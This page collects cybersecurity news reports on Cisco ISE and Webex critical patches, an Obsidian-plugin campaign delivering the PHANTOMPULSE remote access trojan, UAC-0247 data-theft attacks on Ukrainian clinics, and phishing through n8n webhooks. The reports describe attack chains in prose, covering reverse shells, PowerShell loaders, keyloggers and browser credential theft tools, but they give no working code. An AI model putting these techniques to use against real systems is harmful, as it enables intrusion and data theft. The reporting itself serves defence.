It ignores machines. What we’ll walk you through in this session: How to run a full discovery scan of every non-human identity in your environment A framework for right-sizing permissions across service accounts and AI integrations An automated lifecycle policy so dead credentials get revoked before attackers find them A ready-to-use Identity Cleanup Checklist you’ll get during the live session This isn’t a product demo. It’s a working playbook you can take back to your team the same week. Don’t let hidden keys compromise your data.

We’re hosting a live session to walk you through securing these non-human identities step-by-step. 📅 Save Your Spot Today: Register for the Webinar Here . Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Cisco Patches Four Critical Identity Services, Webex Flaws Enabling Code Execution

Cisco has announced patches to address four critical security flaws impacting Identity Services and Webex Services that could result in arbitrary code execution and allow an attacker to impersonate any user within the service. The details of the vulnerabilities are below - CVE-2026-20184 (CVSS score: 9.8) - An improper certificate validation in the integration of single sign-on (SSO) with Control Hub in Webex Services that could allow an unauthenticated, remote attacker to impersonate any user within the service and gain unauthorized access to legitimate Cisco Webex services. CVE-2026-20147 (CVSS score: 9.9) - An insufficient validation of user-supplied input vulnerability in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) that could allow an authenticated, remote attacker in possession of valid administrative credentials to achieve remote code execution by sending crafted HTTP requests. CVE-2026-20180 and CVE-2026-20186 (CVSS scores: 9.9) - Multiple insufficient validation of user-supplied input vulnerabilities in ISE could allow an authenticated, remote attacker in possession of read only admin credentials to execute arbitrary commands on the underlying operating system of an affected device by sending crafted HTTP requests.

“A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root,” Cisco said in an advisory for CVE-2026-20147, CVE-2026-20180, and CVE-2026-20186. “In single-node ISE deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.” CVE-2026-20184 requires no customer action as it’s cloud-based. However, customers who are using SSO are advised to upload a new identity provider (IdP) SAML certificate to Control Hub.

The remaining vulnerabilities have been addressed in the following versions - CVE-2026-20147 Cisco ISE or ISE-PIC Release earlier than 3.1 (Migrate to a fixed release) Cisco ISE Release 3.1 (3.1 Patch 11) Cisco ISE Release 3.2 (3.2 Patch 10) Cisco ISE Release 3.3 (3.3 Patch 11) Cisco ISE Release 3.4 (3.4 Patch 6) Cisco ISE Release 3.5 (3.5 Patch 3) CVE-2026-20180 and CVE-2026-20186 Cisco ISE Release earlier than 3.2 (Migrate to a fixed release) Cisco ISE Release 3.2 (3.2 Patch 8) Cisco ISE Release 3.3 (3.3 Patch 8) Cisco ISE Release 3.4 (3.4 Patch 4) Cisco ISE Release 3.5 (Not Vulnerable) While Cisco noted that it is not aware of any of these shortcomings being exploited in the wild, it’s essential that users update their instances to the latest version for optimal protection. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Finance, Crypto Attacks

A “novel” social engineering campaign has been observed abusing Obsidian, a cross-platform note-taking application, as an initial access vector to distribute a previously undocumented Windows remote access trojan called PHANTOMPULSE in attacks targeting individuals in the financial and cryptocurrency sectors. Dubbed REF6598 by Elastic Security Labs, the activity has been found to leverage elaborate social engineering tactics through LinkedIn and Telegram to breach both Windows and macOS systems, approaching prospective individuals on the professional social network under the guise of a venture capital firm and then moving the conversation to a Telegram group where several purported partners are present. The Telegram group chat is engineered to lend the operation a smidgen of credibility, with the members discussing topics related to financial services and cryptocurrency liquidity solutions. The target is then instructed to use Obsidian to access what appears to be a shared dashboard by connecting to a cloud-hosted vault using the credentials provided to them.

It’s this vault that triggers the infection sequence. As soon as the vault is opened in the note-taking application, the target is asked to enable “Installed community plugins” sync, effectively causing malicious code to be executed. “The threat actors abuse Obsidian’s legitimate community plugin ecosystem, specifically the Shell Commands and Hider plugins, to silently execute code when a victim opens a shared cloud vault,” researchers Salim Bitam, Samir Bousseaden, and Daniel Stepanic said in a technical breakdown of the campaign. Given that the option is disabled by default and cannot be remotely turned on, the attacker must convince the target to manually toggle the community plugin sync on their device so that the malicious vault configuration can trigger the execution of commands through the Shell Commands plugin.

Also used in conjunction with Shell Commands is another plugin named Hider to hide certain user interface elements of Obsidian, such as status bar, scrollbar, tooltips, and others. “While this attack requires social engineering to cross the community plugin sync boundary, the technique remains notable: it abuses a legitimate application feature as a persistence and command execution channel, the payload lives entirely within JSON configuration files that are unlikely to trigger traditional AV [antivirus] signatures, and execution is handed off by a signed, trusted Electron application, making parent-process-based detection the critical layer,” the researchers said. Dedicated execution paths are activated depending on the operating system. On Windows, the commands are used to invoke a PowerShell script to drop an intermediate loader codenamed PHANTOMPULL that decrypts and launches PHANTOMPULSE in memory.

PHANTOMPULSE is an artificial intelligence (AI)-generated backdoor that uses the Ethereum blockchain for resolving its command-and-control (C2) server by fetching the latest transaction associated with a hard-coded wallet address . Upon obtaining the C2 address, the malware uses WinHTTP for communications, allowing it to send system telemetry data, fetch commands and transmit the execution results, upload files or screenshots, and capture keystrokes. The supported commands are designed to facilitate comprehensive remote access - inject , to inject shellcode/DLL/EXE into target process drop , to drop a file to disk and execute it screenshot , to capture and upload a screenshot keylog , to start/stop a keylogger uninstall , to initiate removal of persistence and perform cleanup elevate , to escalate privileges to SYSTEM via the COM elevation moniker downgrade , to transition from SYSTEM to elevated admin On macOS, the Shell Commands plugin delivers an obfuscated AppleScript dropper that iterates over a hard-coded domain list, while employing Telegram as a dead drop resolver for fallback C2 resolution. This approach also offers added flexibility as it makes it possible to easily rotate C2 infrastructure, rendering domain-based blocking insufficient.

In the final step, the dropper script contacts the C2 domain to download and execute a second-stage payload via osascript. The exact nature of this payload remains unknown given that the C2 servers are currently offline. The intrusion was ultimately unsuccessful, as the attack was detected and blocked before the adversary could accomplish their goals on the infected machine. “REF6598 demonstrates how threat actors continue to find creative initial access vectors by abusing trusted applications and employing targeted social engineering,” Elastic said.

“By abusing Obsidian’s community plugin ecosystem rather than exploiting a software vulnerability, the attackers bypass traditional security controls entirely, relying on the application’s intended functionality to execute arbitrary code.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaign

The Computer Emergencies Response Team of Ukraine (CERT-UA) has disclosed details of a new campaign that has targeted governments and municipal healthcare institutions, mainly clinics and emergency hospitals, to deliver malware capable of stealing sensitive data from Chromium-based web browsers and WhatsApp. The activity, which was observed between March and April 2026, has been attributed to a threat cluster dubbed UAC-0247 . The origins of the campaign are presently unknown. According to CERT-UA, the starting point of the attack chain is an email message claiming to be a humanitarian aid proposal, urging recipients to click on a link that redirects to either a legitimate website compromised via a cross-site scripting (XSS) vulnerability or a bogus site created with help from artificial intelligence (AI) tools.

Regardless of what the site is, the goal is to download and run a Windows Shortcut (LNK) file, which then executes a remote HTML Application (HTA) using the native Windows utility, “mshta.exe.”The HTA file, for its part, displays a decoy form to divert the victim’s attention, while simultaneously fetching a binary responsible for injecting shellcode into a legitimate process (e.g., “runtimeBroker.exe”). “At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with full support for code and data sections, import of functions from dynamic libraries, and relocation), and the final payload is additionally compressed and encrypted,” CERT-UA said. One of the stagers is a tool called TCP reverse shell or its equivalent, tracked as RAVENSHELL, which establishes a TCP connection with a management server to receive commands for execution on the host using “cmd.exe.” Also downloaded to the infected machine is a malware family dubbed AGINGFLY and a PowerShell script referred to as SILENTLOOP that comes with several functions to execute commands, auto-update configuration, and obtain the current IP address of the management server from a Telegram channel, and fall back to alternative mechanisms for determining the command-and-control (C2) address. Developed using C#, AGINGFLY is engineered to provide remote control of the affected systems.

It communicates with a C2 server using WebSockets to fetch commands that allow it to run commands, launch a keylogger, download files, and run additional payloads. An investigation of about a dozen incidents has revealed that these attacks facilitate reconnaissance, lateral movement, and the theft of credentials and other sensitive data from WhatsApp and Chromium-based browsers. Thisis accomplished by deploying various open-source tools, such as those listed below - ChromElevator , a program designed to bypass Chromium’s app-bound encryption (ABE) protections and harvest cookies and saved passwords ZAPiXDESK , a forensic extraction tool to decrypt local databases for WhatsApp Web RustScan , a network scanner Ligolo-Ng , a lightweight utility to establish tunnels from reverse TCP/TLS connections Chisel , a tool for tunneling network traffic over TCP/UDP XMRig, a cryptocurrency miner The agency said there is evidence suggesting that representatives of the Defense Forces of Ukraine may also have been targeted as part of the campaign. Thisis based on the distribution of malicious ZIP archives via Signal that are designed to drop AGINGFLY using the DLL side-loading technique.

To mitigate the risk associated with the threat and minimize the attack surface, it’s recommended to restrict the execution of LNK, HTA, and JS files, along with legitimate utilities such as “mshta.exe,” “powershell.exe,” and “wscript.exe.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

n8n Webhooks Abused Since October 2025 to Deliver Malware via Phishing Emails

Threat actors have been observed weaponizing n8n , a popular artificial intelligence (AI) workflow automation platform, to facilitate sophisticated phishing campaigns and deliver malicious payloads or fingerprint devices by sending automated emails. “By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery vehicles for persistent remote access,” Cisco Talos researchers Sean Gallagher and Omid Mirzaei said in an analysis published today. N8n is a workflow automation platform that allows users to connect various web applications, APIs, and AI model services to sync data, build agentic systems, and run repetitive rule-based tasks. Users can register for a developer account at no extra cost to avail a managed cloud-hosted service and run automation workflows without having to set up their own infrastructure.Doing so, however, creates a unique custom domain that goes by the format – .app.n8n.cloud – from where a user can access their applications.

The platform also supports the ability to create webhooks to receive data from apps and services when certain events are triggered.Thismakes it possible to initiate a workflow after receiving certain data.The data, in this case, is sent via a unique webhook URL. According to Cisco Talos, it’s these URL-exposed webhooks – which make use of the same *.app.n8n[.]cloud subdomain – that has been abused in phishing attacks as far back as October 2025. “A webhook, often referred to as a ’reverse API,’ allows one application to provide real-time information to another. These URLs register an application as a ’listener’ to receive data, which can include programmatically pulled HTML content,” Talos explained.

“When the URL receives a request, the subsequent workflow steps are triggered, returning results as an HTTP data stream to the requesting application. If the URL is accessed via email, the recipient’s browser acts as the receiving application, processing the output as a web page.” What makes this significant is that it opens a new door for threat actors to propagate malware while maintaining a veneer of legitimacy by giving the impression that they are originating from a trusted domain. Threat actors have wasted no time taking advantage of the behavior to set up n8n webhook URLs for malware delivery and device fingerprinting. The volume of email messages containing these URLs in March 2026 is said to have been about 686% higher than in January 2025.

In one campaign observed by Talos, threat actors have been found to embed an n8n-hosted webhook link in emails that claimed to be a shared document. Clicking the link takes the user to a web page that displays a CAPTCHA, which, upon completion, activates the download of a malicious payload from an external host. “Because the entire process is encapsulated within the JavaScript of the HTML document, the download appears to the browser to have come from the n8n domain,” the researchers noted. The end goal of the attack is to deliver an executable or an MSI installer that serves as a conduit for modified versions of legitimate Remote Monitoring and Management (RMM) tools like Datto and ITarian Endpoint Management, and use them to establish persistence by establishing a connection to a command-and-control (C2) server.

A second prevalent case concerns the abuse of n8n for fingerprinting. Specifically, this entails embedding in emails an invisible image or tracking pixel that’s hosted on an n8n webhook URL. As soon as the digital missive is opened via an email client, it automatically sends an HTTP GET request to the n8n URL along with tracking parameters, like the victim’s email address, thereby enabling the attackers to identify them. “The same workflows designed to save developers hours of manual labor are now being repurposed to automate the delivery of malware and fingerprinting devices due to their flexibility, ease of integration, and seamless automation,” Talos said.

“As we continue to leverage the power of low-code automation, it’s the responsibility of security teams to ensure these platforms and tools remain assets rather than liabilities.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.